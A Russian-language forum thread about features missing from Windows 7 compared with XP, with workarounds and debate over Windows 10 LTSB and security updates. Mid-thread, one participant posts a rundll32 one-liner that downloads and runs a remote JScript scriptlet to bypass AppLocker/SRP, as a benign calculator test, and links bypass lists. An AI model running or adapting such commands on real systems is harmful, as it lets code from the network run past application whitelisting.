Тема: OFF: Чего не хватает в Windows 7
Переезжая с Windows XP на Windows 7, заметил ряд неприятных изменений, которые я буду ниже перечислять. Ну и предлагать / обсуждать возможные пути обхода, замену, костыли.
Вы не вошли. Пожалуйста, войдите или зарегистрируйтесь.
Страницы 1
Чтобы отправить ответ, вы должны войти или зарегистрироваться
Переезжая с Windows XP на Windows 7, заметил ряд неприятных изменений, которые я буду ниже перечислять. Ну и предлагать / обсуждать возможные пути обхода, замену, костыли.
1. В Проводнике остался поиск файлов и папок, но пропала возможность поиска в содержимом файлов.
2. В Проводнике пропала кнопка "вверх".
…но пропала возможность поиска в содержимом файлов.
Либо задать параметр:
2. В Проводнике пропала кнопка "вверх".
Это да. Либо пользовать адресную строку, тыкая на родительский каталог, либо пользовать комбинацию «Alt-Up».
3. Ранее можно было проверить веб-камеру, она находилась в "Моём компьютере".
Тут мне известно два костыля. Первый - во флеш-плейере щёлкнуть ПКМ и выбрать пункт меню "Параметры", далее во вкладке "Камера" будет видна картинка с веб-камеры, но очень мелко. Второй - скачать swf-файл, который сделали специально для теста веб-камеры.
Э, а в Десятке-то появилась стрелка вверх. Придётся вам на неё переходить.
ypppu, а зачем вы на семерку переходите?
Переходите сразу на десятку, семерка скоро поддерживаться перестанет.
Если переживаете, что за вами следят, то ставьте windows 10 ltsb.
Я десятку чуть-чуть пробовал, она мне очень сильно не понравилась. Примитивный интерфейс, неудобное плиточное меню "Пуск", реклама на рабочем столе. Пробовал принтер подключить - там все настройки перетасовали зачем-то. Локально всё-таки настроил, а через роутер уже не хочет. Надеюсь, что этот бред уберут "в следующей серии". Система стала более требовательна к железу, а что взамен?.. Пока что впечатление от десятки такое:
Знаю, что в Win10 стрелка вверх появилась, и что под Win7 спец. проги есть для её имитации, и гор. клавишу пользую. Просто считаю нужным перечислить недостатки Win7.
Есть, конечно, у семёрки и плюсы (например, при редактировании имени файла расширение не выделяется, что экономит телодвижения). Но нельзя же в новой версии делать хуже чем было в старой!
P. S. Вообще я на семёрку-то перешёл только из-за того, что купил новый компьютер, WinXP на него не ставилась.
4. Из меню Проводника "Сервис --> Параметры папок" убрали возможность делать настройки для отдельных типов файлов (по расширению).
Попробуйте таки win10 ltsb.
1. Главное и существенное отличие этой редакции от всех существующих - в ней НЕТ той кучи говна в виде плитки которую хер уберешь, встроенного софта, такого как магазин, браузер Edge, проигрыватель Groove, почта, погода, бизнес, скайп и даже Contara которые кроме как отжирания ресурсов компа больше ничего полезного не дают.
2. Данная редакция не будет обновляться до сборки Threshold 2, Redstone2 и последующих глобальных обновлений, а будет получать лишь стабильные, обкатанные и проверенные обновления, а не те, кривые обновления и драйверы которым майкрософт будет пичкать остальные редакции.
3. LTSB позволяет полностью отключить службы, связанные с телеметрией и сбором пользовательских данных - это особо актуально для тех параноиков, которые верят что ЦРУ, СБУ, ФСБ, Ми7 и Массад следит за каждым из нас и записывают каждый байт информации с наших компов.
4. Если кому важен плиточный интерфейс, он сам может его настроить по своему вкусу, в этой редакции доступны все Десктопные функции, поле поиска на панели задач служит для простого поиска файлов на комьютере.
Да есть и "недостатки", в этой редакции, но о них просто смешно говорить, представляете, там отсутствует встроенный просмотрщик картинок, будьте готовы, ведь без этого приложения жизнь невозможна, НО, шепотом на ушко, что бы никто не услышал, эту функцию можно включить стандартными средствами винды )))) , так же заблокирован раздел персонализации, но его можно разблокировать с помощью нехитрой коммандной строки: rundll32.exe shell32.dll,Control_RunDLL desk.cpl,Advanced,@Advanced - все, выбирайте что радует глаз), в остальном это сказка а не ОС.
Malcev, спасибо за подсказку. Но что там есть в win10 ltsb хорошего-полезного, чего нет в win7?
То, что в начале 2020 года win7 перестанет поддерживаться.
А это значит, что взломать ваш компьютер будет вразы проще.
И если вам не повезет и с вашего айпи начнут делать что-то нехорошее, то может нагрянуть полиция по борьбе с киберпреступлениями.
в начале 2020 года win7 перестанет поддерживаться
Обновления безопасности будут выходить еще ого-го как долго.
Та же неподдерживаемая XP будет получать их как минимум до апреля 2019 - http://ironfriends.ru/obnovleniya-windo … hhayutsya/.
взломать ваш компьютер будет вразы проще.
У меня Win7 SP1 без обновлений. Безопасность все таки не с них начинается, имхо.
с вашего айпи начнут делать что-то нехорошее
Владельцы tor-нод как-то живут...
Судя по отзывам даже без телеметрии новая система живет своей жизнью:
https://habr.com/company/pc-administrator/blog/413395/.
Я вообще никогда не понимал - что такое обновление безопасности? XP работала и работала. Не будешь запускать вирусные программы - всё будет хорошо. Чтобы из Сети не сканировали порты, пользовался файерволом.
Обновления безопасности будут выходить еще ого-го как долго.
Может, да, а может и нет.
Всё-равно кончится тем, что поизводители софта перестанут его поддерживать.
Владельцы tor-нод как-то живут...
Кто-то живёт, а у кого-то компьютеры забирают на проверку, которая длится месяцами.
Судя по отзывам даже без телеметрии новая система живет своей жизнью:
Так там же не про ltsb версию.
Я вообще никогда не понимал - что такое обновление безопасности?
Ну простейший пример - вставили флешку с вирусом, либо зашли на зараженный сайт и без этого обновления сразу же перенесли его к себе на компьютер:
https://www.securitylab.ru/vulnerability/395902.php
Malcev, отвечу про вирус. У меня отключен автозапуск со съёмных носителей, включена политика ограничения запуска посторонних программ, плюс нефиг работать из-под администратора.
И если может быть дырка в Win7, значит могут быть дырки и в Win10, то есть переход на Win10 не исключает все риски. А если так, то можно просто делать периодически резервное копирование. Если всё сломается - быстренько восстановить.
Дырки везде есть, даже в процессорах, но особенно полно их в софте - джава, акробат, флеш, хром...
переход на Win10 не исключает все риски
Конечно не исключает. Но когда перестанут выпускать критические обновления для Win-7, вы же их не сами будете писать.
можно просто делать периодически резервное копирование. Если всё сломается - быстренько восстановить
А если резервная копия будет тоже заражена и зашифрована?
И совсем необязательно, что поймав зловреда у вас рухнет система.
Вы даже можете и не заметить его присутствие, а в тоже время будете участвовать в брутфорсе, спамить, майнить биткоины, ну или на левые кредитки накупят товаров с вашего айпи.
Да и в чём смысл сидеть на старой ОС?
Вон по ссылке от stealzy в комментариях советуют тоже ltsb версию.
Резервную копию можно хранить на отдельном носителе.
Конечно не исключает. Но когда перестанут выпускать критические обновления для Win-7, вы же их не сами будете писать.
Я на XP (которая теоретически более дырявая) вообще обходился без обновлений. Файервол не зафиксировал никакой исходящей активности.
Да и в чём смысл сидеть на старой ОС?
Потому что тупо ничего предпринимать не надо. А в чём смысл переходить на Win10? Будут новые дырки, будут исправления, не исключающие все риски. Короче, одни неудобства и трата времени. Я не пользовался вистой и восьмёркой и не чувствую чтобы что-то потерял.
Дырки везде есть, даже в процессорах, но особенно полно их в софте - джава, акробат, флеш, хром...
Malcev, а в чём выражается дырявость джава, акробат, флеш, хром?..
А в чём смысл переходить на Win10? Будут новые дырки, будут исправления, не исключающие все риски. Короче, одни неудобства и трата времени
Ну так вас же уже вынудили пересесть с WinXP, зачем привыкать к Win7, когда в будущем также вынудят с нее перейти.
Насчет дырок - в Win10 их будут латать, а в WIn7 они будут только увеличиваться.
Дырявость - количество уязвимостей в коде программы, благодаря которым можно внедрить свой код (знаю только теоритически).
Честно говоря, все эти доводы для меня звучат крайне неубедительно.
ypppu, вам даже к Семёрке привыкать не надо. Поставьте ХР на виртуальную машину и работайте на ней в полноэкранном режиме. Новый комп у вас, думаю, достаточно мощный, чтобы вы не заметили разницы.
YMP, спасибо, я уже полгода тренируюсь, до этого ещё на работе полгода. В общем привык к Семёрке. Пока что впечатление как от WinXP: косяки есть, но поправимо. Нужно доработать напильником.
в будущем также вынудят с нее перейти
Для начала нужно будет купить железо без драйверов к семерке.
И потом, откуда уверенность что переход будет на Windows ?
По поводу дырок - вас не смущает ХР у топикстартера? Она ведь должна состоять уже из одних увеличенных дырок.
На деле достаточно настроить фаервол и политику ограниченного использования программ (SRP) и/или проактивку (HIPS comodo).
Кстати, я видел тогда образец эксплуатирующий уязвимость с вашего примера, полезной нагрузкой там шла .dll.
SRP как раз и не позволяет запускаться/загружаться исполняемым файлам откуда попало, с флешки и папки TEMP в частности.
Забавно что пользователям Far-менеджера та уязвимость почти не грозила, т.к. он не отображал иконки.
А проверьте на своей системе код из этих примеров обойдет правильно настроенное SRP?
But if you use SRP/AppLocker as a security layer against (skilled) evil haxors, then you have to be aware that there is a large hole in your security layer and that it’s easy to misuse
https://blog.didierstevens.com/2011/01/ … by-design/
https://xakep.ru/2016/04/22/applocker-bypass/
Malcev, а как проверить? Нужно по какой-то ссылке пройти в браузере?
Вот тут подробней и больше тестов:
https://github.com/api0cradle/UltimateA … ByPassList
Блог автора:
https://oddvar.moe/
Если бы я хорошо знал английский, то не спрашивал бы. Malcev, поясните своими словами, в чём заключается уязвимость. Что я должен сделать такого, чтобы случайно запустить вредоносный код? Я же сам не буду вручную запускать незнакомую библиотеку через rundll32.exe.
Проверка запуска скриптов, эксешников, регистрации dll на вашей машине:
Например вбейте этот код в cmd и он создаст бекдоор, через который откроет у вас калькулятор:
rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:https://raw.githubusercontent.com/3gstudent/Javascript-Backdoor/master/test")
Перед тем как запускать, проверьте, что находится по ссылке:
https://raw.githubusercontent.com/3gstu … aster/test
Должно быть:
<?xml version="1.0"?>
<package>
<component id="testCalc">
<script language="JScript">
<![CDATA[
var r = new ActiveXObject("WScript.Shell").Run("calc.exe");
]]>
</script>
</component>
</package>
Что я должен сделать такого, чтобы случайно запустить вредоносный код?
Повторюсь, ничего запускать не надо, достаточно просто зайти на заражённый сайт.
Можно, конечно, поискать в гугле либо на тематических форумах такие, но вы будете на них заходить и тестировать?
Лично у меня такого желания нет.
Вообще тут у автора много всяких разностей:
https://github.com/3gstudent?tab=repositories
Malcev в тексте по вашей цитате говорится что использование против общих угроз - ок, опасаться нужно прицельного человеческого взлома.
код из этих примеров
Примеры для AppLocker, а не SRP, кроме первой ссылки. Опять таки нужна уязвимость чего-то что бы просто их запустить.
достаточно просто зайти на заражённый сайт
Ну нет, надо иметь старые версии java или flash плагинов, желательно чтобы плагины на странице загружались автоматически а не по запросу. Плагин загрузит .ехе во временную папку и попытается его запустить.
Повторюсь, ничего запускать не надо, достаточно просто зайти на заражённый сайт.
Кто будет запускать rundll32.exe?
Примеры для AppLocker, а не SRP
С SRP такие номера не пройдут?
Ну нет, надо иметь старые версии java или flash плагинов
Совсем необязательно, достаточно иметь неапгрейженый броузер и не отключить джаваскрипт (куда сейчас без него).
Атака с помощью скрытой загрузки
Скрытая загрузка — привычный метод распространения вредоносного ПО. Злоумышленники ищут незащищенные сайты и внедряют вредоносные скрипты в их HTTP- или PHP-код. Этот скрипт может установить вредоносное ПО напрямую на компьютер пользователя, посетившего сайт или создать IFRAME-форму, которая перенаправит жертву на сайт, контролируемый злоумышленниками.
Для успеха атаки жертве не нужно выполнять никаких действий: достаточно посетить зараженный ресурс.
Кто будет запускать rundll32.exe?
Исполняемый файл, который загрузит и запустит скрипт с зараженного сайта.
Исполняемый файл,
Какой исполняемый файл? Откуда он возьмётся, и кто его запустит?
Пользуясь случаем похвастаюсь почему я не переживаю о подобных вещах. Ключевым моментом во всех сценариях является запуск взломанным процессом другого процесса (payload). Но если запуск процессов находится под контролем...
Как видно единственным, что браузерам разрешено запускать, является группа "браузеры", куда в частности входят торрент-качалка и флеш.
Помимо этого браузеры входят в группу "Все приложения", которым разрешено запускать эксплорер, архиваторы, текстовые редакторы и медиа-просмотрщики. Поэтому проблем с открытием из меню загрузок браузера нет.
Любая попытка запустить что-то неразрешенное вызовет оповещение-вопрос от HIPS.
Можно заметить что в группу файлов "Веб-браузеры" они добавлены относительными путями, и при отсутсвии SRP браузер может запустить malware с именем firefox.exe, но для начала такой файл надо создать, а разрешения на тихое создание/изменение .exe файлов у браузера нет, так-то.
достаточно иметь неапгрейженый броузер и не отключить джаваскрипт
Интересно, в реальности не встречал, надо бы найти и потестировать.
5. В стандартном просмотрщике картинок перестала работать GIF анимация - показывает только первый кадр; некоторые анимированные GIF не показывает вообще, даже 1ый кадр. И сглаживание убрали.
У меня жесткие диски зазеркалены с помощью виндовса, но есть огромный минус, что когда зеркало ломается, то оповещение не приходит.
Проблему решил с помощью скрипта на автохотки:
http://forum.script-coding.com/viewtopi … 394#p80394
6. Перестали работать DOS-программы.
Можно пользоваться эмулятором, но он не работает с принтером.
Я ошибался, в 32-битной Windows 7 работают. Правда, на некоторых компьютерах не переходит в полноэкранный режим, и нужно прописывать встроенные переменные в ОС, но это, похоже, частности.
7. Мастер сканирования теперь автоматически завершает работу после 1 сканирования. Приходится запускать его заново, выставлять настройки по-новому. И нельзя сканировать сразу нужную область. Только после прокатки "предварительного просмотра" появляется прямоугольник выделения нужной области.
Сегодня я внезапно заметил, что в Win10 можно прокручивать неактивные окна колесом мыши. Я для этого использую скрипт, но оказывается, это уже есть в 10-ке. По-моему, изначально этой фишки не было — появилась с каким-то обновлением.
Но так или иначе, этого нет в 7-ке.
Обнаружил неприятный баг семерки - неправильно определяет длительность некоторых видеофайлов, соответственно WMP также подхватывает неверную длительность при проигрывании и метод GetDetailsOf тоже.
На Win10 показывает правильно.
Кодек-паков не установлено.
Вначале грешил на кривую обработку ffmpeg, но недавно получил такой же глюк файла напрямую из камеры.
Например, этот файл на Win10 показывает длительность 00:00:17, а на семёрке 18:32:40.
https://ru.files.fm/f/fh4e3tzz
8. В Windows 7 уже нельзя размещать значки в папках так, как тебе удобно. Принудительно действуют опции "упорядочить автоматически" и "выровнять по сетке" (за исключением рабочего стола). В Windows XP она отключалась, а в Windows 7 уже нет.
Я где-то находил настройки для реестра. Они дают такой стиль отображения, при котором значки можно перетаскивать в произвольные координаты. Вроде бы называется "расширенная плитка". Но работает криво. Например перетащил текстовый файлик в удобное тебе место, отредактировал в Блокноте, нажал "Сохранить", и значок тут же перепрыгивает в левый верхний угол.
5. В стандартном просмотрщике картинок перестала работать GIF анимация. И сглаживание убрали.
Это как так? Прислали вам обновление, где все поломали? Вроде в обновлениях одно время приходила Windows 10, наверное теперь оставшихся решили взять измором.
Стандартные блокнот, просмотрщик, медиаплеер и интернет-эксплорер программы конечно полезные, но требовать от них чего-либо жестоко.
6. Перестали работать DOS-программы.
В ХР работали, а с висты уже нет — это имеется ввиду? Просто уже больше десяти лет прошло...
7. Мастер сканирования чего?
Обнаружил неприятный баг семерки
У пользователи европейской N редакции семерки этого бага нет.
Полагаться на встроенные методы винды в динамичных сферах медиа и веб едва ли когда было надежным.
Мне вот в этом году написали баг-репорт когда код ComObjCreate("WinHttp.WinHttpRequest.5.1") выдавал ошибку в связи с отсутствием такого объекта в системе. Оказалось у человека стоит Windows 2003. Как-то мне в голову не пришло создать тему "Чего не хватает в Windows 2003", может еще не поздно ?
Это как так? Прислали вам обновление, где все поломали?
Неприятность с просмотрщиком идёт в комплекте с семёркой. Сглаживание где-то нужно, где-то не нужно. Но если оно таки было в XP, то почему его искоренили в семёрке? Или сделать опциональным, или вообще не трогать.
А обрезание GIF анимации вообще уму не постижимо. Давайте сразу тогда выпилим блокнот, калькулятор и пр. мелочи и скажем: "Виндус - это только ОС. Приложения в базовую комплектацию не входят." Стандартные блокнот, просмотрщик и медиаплеер мне нравились в XP. Не вижу смысла лишать встроенную программу полезных функций.
В ХР работали, а с висты уже нет — это имеется ввиду? Просто уже больше десяти лет прошло. Может и с висты, я её не изучал подробно.
Добавлено: Я был неправ. В Windows 7x32 DOS-программы работают. Даже в В Windows 10x32 в общем и целом DOS-программы работают, почти без косяков.
7. Мастер сканирования чего?
Мастер работы со сканерами и камерами.
"Чего не хватает в Windows 2003"
Я-то говорю про то хорошее, что было, но испортили. А не про то, чего появилось позднее.
stealzy, а какая у вас версия shell32.dll?
На других неапгрейженых версиях Win-7 у вас баг имеется?
Полагаться на встроенные методы винды в динамичных сферах медиа и веб едва ли когда было надежным.
Проблема в том, что WMP криво воспроизводит такие файлы.
А многие пользователи пользуются именно им.
Виндус - это только ОС. Приложения в базовую комплектацию не входят.
Входят для галочки. Сравнить с базовой комплектацией mac os или стандартным набором из репозиториев любого линукса.
Malcev, увы, N редакция отличается от обычной только отсутствием WMP.
Кодек-паков не установлено
Возможно какой-то кодек улучшит поддержку mts. mkv, webm без кодеков вовсе не воспроизводит, а flv этому плееру даже с ними не дастся.
stealzy, а у вас какой объект прописан в:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\PropertySystem\PropertyHandlers\.mts
И к какой dll он принадлежит?
И если он принадлежит к mf.dll, то какая у mf.dll версия?
Данной ветки у меня нет. Само расширение .mts асоциировано с DaumPot плеером:
HKEY_CLASSES_ROOT\.MTS
HKEY_CLASSES_ROOT\.MTS, , PotPlayerMini64.MTS
HKEY_CLASSES_ROOT\CLSID\{4111111D-0313-11D1-B1AB-00AA00BA1158}\ProgID, , Mts.MtsGrp
HKEY_CLASSES_ROOT\Mts.MtsGrp
HKEY_CLASSES_ROOT\PotPlayerMini64.MTS
HKEY_CLASSES_ROOT\Wow6432Node\CLSID\{4111111D-0313-11D1-B1AB-00AA00BA1158}\ProgID, , Mts.MtsGrp
HKEY_CURRENT_USER\Software\Daum\PotPlayerMini64\FileIconList, 53, .MTS*Видео (MTS)*C:\Program Files\PotPlayer\PotIcons64.dll*78
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.mts
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.mts\OpenWithProgids, PotPlayerMini64.MTS,
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RecentDocs\.mts
HKEY_LOCAL_MACHINE\SOFTWARE\Clients\Media\PotPlayerMini64\Capabilities\FileAssociations, .MTS, PotPlayerMini64.MTS
HKEY_LOCAL_MACHINE\SOFTWARE\Clients\Media\PotPlayerMini64\Capabilities\FileAssociations, .MTS, PotPlayerMini64.MTS
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\KindMap, .mts, video
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Classes\CLSID\{4111111D-0313-11D1-B1AB-00AA00BA1158}\ProgID, , Mts.MtsGrp
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Clients\Media\PotPlayerMini64\Capabilities\FileAssociations, .MTS, PotPlayerMini64.MTS
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Clients\Media\PotPlayerMini64\Capabilities\FileAssociations, .MTS, PotPlayerMini64.MTS
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\KindMap, .mts, video
Понятно, значит mf.dll глючит, потому как на win10 за отображение информации mts отвечает mfmpeg2srcsnk.dll.
У меня жесткие диски зазеркалены с помощью виндовса
Это как?
Попробуйте таки win10 ltsb.
Нет ли где образа этой версии для Акрониса (не привязанного к железу)?
Акронисом не пользуюсь.
А образа для программы с функционалом Акрониса?
Такими тоже не пользуюсь.
8. Случается, что с момента включения компьютера долгое время невозможно установить VPN-соединение. Как выяснилось, некоторые сетевые службы не включаются автоматически. Лечится изменением настроек запуска в services.msc.
Вообще я на семёрку-то перешёл только из-за того, что купил новый компьютер, WinXP на него не ставилась.
Ну вот, оказывается можно было WinXP на интеловские 300ые чипсеты ставить. Единственное что, нужна видеокарта, для которой существуют XP'ишные драйверы.
Страницы 1
Чтобы отправить ответ, вы должны войти или зарегистрироваться